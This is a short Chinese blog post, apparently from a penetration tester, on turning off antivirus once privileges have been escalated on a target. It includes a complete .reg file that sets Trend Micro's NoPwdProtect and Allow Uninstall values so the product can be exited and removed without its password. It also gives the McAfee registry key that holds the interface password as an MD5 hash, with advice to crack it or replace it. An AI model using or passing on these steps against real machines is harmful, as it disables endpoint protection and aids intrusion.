渗透测试中遭遇杀毒软件

最近测试一个项目，提权时遇到了杀毒软件，N多工具都被杀掉了，虽然最后都成功提权了，但是还是或多或少的给我们提权造成了不少的麻烦，尤其是提权成功后使用cain嗅探，cain被秒杀，别提多郁闷了。这里就我提权过程中遇到的两款杀毒软件来进行一下总结，总结一下如何在提权成功后关掉这两款杀毒软件。

1、免密码关掉趋势杀毒软件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc.]
"NoPwdProtect"=dword:00000001
"Allow Uninstall"=dword:00000001

;其中【"NoPwdProtect"=dword:00000001】为退出趋势，改为【0】即可恢复，推出密码
;其中【"Allow Uninstall"=dword:00000001】为卸载趋势，改为【0】即可恢复，卸载密码

将以上内容保存为waitalone.reg，然后双击导入即可免密码退出趋势杀毒软件。

2、破解McAfee杀毒软件密码

McAfee杀毒软件的用户界面解锁密码保存于以下注册表路径：

HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection

其实子键UIP就是杀毒软件用户界面解锁密码，是md5密文，大家直接在cmd5上面解密即可，如果解不出来的话就自己生成一个替换即可。

参考文章：

http://www.jb51.net/hack/33933.html

from www.waitalone.cn.thanks for it.